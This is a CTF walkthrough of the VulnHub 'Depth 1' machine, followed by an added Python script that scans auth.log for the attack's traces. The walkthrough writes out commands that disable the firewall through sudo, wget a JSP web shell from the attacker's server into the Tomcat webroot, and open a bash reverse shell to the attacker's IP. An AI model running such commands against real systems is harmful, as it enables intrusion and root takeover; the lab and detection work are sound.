Depth 1 – CTF Walkthrough

November 24, 2017 by Chiragh Dewan

Depth 1 is a relatively new machine that surfaced on VulnHub on October 27th, 2017. It was created by Dan Lawson. It can be downloaded from https://www.vulnhub.com/entry/depth-1,213/

The objective of the machine is to gain root privileges and read the flag.

I will be using Kali 2017.1 as my target machine running on VirtualBox, and I will be running the victim machine, Depth 1, on VirtualBox as well.

Once booted, this is what the machine looks like:

After going through so many machines, I like the fact that the IP is displayed on the login.

Since we have the IP, let’s scan and see which ports are open:

As we can see, an Apache Tomcat server is running on port 8080. Let’s head over there and see what’s happening:

I tried basic username and password combinations to log in via the Manager web app, but nothing worked:

I also tried using auxiliary/scanner/http/tomcat_mgr_login via Metasploit, but even that did not work:

I then decided to run Nikto to see whether it would show me something I could use:

And it did. I went back to the web app and opened the file:

When I tried the command mentioned on the page, it returned a directory listing of the folder /tmp:

Exploring further, I see that the user bill has an ssh directory and a file called sudo_as_admin_successful. However, when scanning for ports, I could not find port 22 open, which could mean that there is a firewall in place:

Before going further, I want to check the path of this page and see if there’s a way I can upload a JSP shell to it:

I run the following command to check the permissions:

sh -c $@|sh . echo ssh bill@localhost sudo -l


The first thing I do is disable the firewall with:

sh -c $@|sh . echo ssh bill@localhost sudo ufw disable

Now that the firewall is down, it is time to upload a JSP shell.

I used the code from the following site: https://blog.netspi.com/hacking-with-jsp-shells/

I saved it as shell.jsp on my Desktop.

Next, I start a simple Python HTTP server to host the file:

I will be uploading the file to the path where test.jsp is hosted, which is: /var/lib/tomcat8/webapps/ROOT/

Next, I type the following command in test.jsp to upload the JSP shell:

sh -c $@|sh . echo ssh bill@localhost sudo wget "http://10.0.2.15:8000/shell.jsp" -O /var/lib/tomcat8/webapps/ROOT/shell.jsp

and as you can see, our shell.jsp has been uploaded successfully:

Now it’s time to get a remote connection:

and on the shell, we write:

ssh bill@localhost sudo bash -i>& /dev/tcp/10.0.2.15/4444 0>&1

and we are root!! Here’s the flag:
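
A defender's view of the steps above, as an added example that is not part of the original walkthrough: a small Python scan of sudo entries in auth.log for the three root actions performed through bill's sudo rights (disabling ufw, writing a .jsp into the Tomcat webroot, starting a root shell with no TTY). The log lines, host name, binary paths and rule names are constructed for illustration and assume the default sudo syslog format.

```python
import re

# Constructed sample of /var/log/auth.log sudo entries (not captured from the Depth 1 VM).
SAMPLE_AUTH_LOG = """\
Nov 24 10:01:12 depth sudo:     bill : TTY=unknown ; PWD=/home/bill ; USER=root ; COMMAND=list
Nov 24 10:02:40 depth sudo:     bill : TTY=unknown ; PWD=/home/bill ; USER=root ; COMMAND=/usr/sbin/ufw disable
Nov 24 10:05:03 depth sudo:     bill : TTY=unknown ; PWD=/home/bill ; USER=root ; COMMAND=/usr/bin/wget http://10.0.2.15:8000/shell.jsp -O /var/lib/tomcat8/webapps/ROOT/shell.jsp
Nov 24 10:07:55 depth sudo:     bill : TTY=unknown ; PWD=/home/bill ; USER=root ; COMMAND=/bin/bash -i
Nov 24 10:09:00 depth sudo:     bill : TTY=pts/0 ; PWD=/home/bill ; USER=root ; COMMAND=/usr/bin/apt update
"""

# Default sudo log layout: "<user> : TTY=... ; PWD=... ; USER=... ; COMMAND=..."
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?TTY=(?P<tty>\S+) ; "
    r".*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

def rule_hits(entry):
    """Return the names of the rules that one parsed sudo entry triggers."""
    cmd, hits = entry["cmd"], []
    if re.search(r"\bufw\s+disable\b", cmd):
        hits.append("firewall-disabled")
    if re.search(r"/var/lib/tomcat8/webapps/\S+\.jsp\b", cmd):
        hits.append("jsp-written-to-webroot")
    # The /dev/tcp redirection is done by the calling shell, so sudo only
    # records "bash -i"; the missing TTY is what makes the entry stand out.
    if entry["tty"] == "unknown" and re.match(r"\S*/(ba)?sh\b", cmd):
        hits.append("root-shell-without-tty")
    return hits

def scan(log_text):
    """Return (rule, user, command) for every suspicious sudo entry."""
    findings = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m:
            continue
        for hit in rule_hits(m.groupdict()):
            findings.append((hit, m["user"], m["cmd"]))
    return findings

if __name__ == "__main__":
    for rule, user, cmd in scan(SAMPLE_AUTH_LOG):
        print(f"[{rule}] user={user} cmd={cmd}")
```

The underlying fix is on the host: remove the test.jsp command page from the webroot and do not leave a service-reachable account with unrestricted, passwordless sudo.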
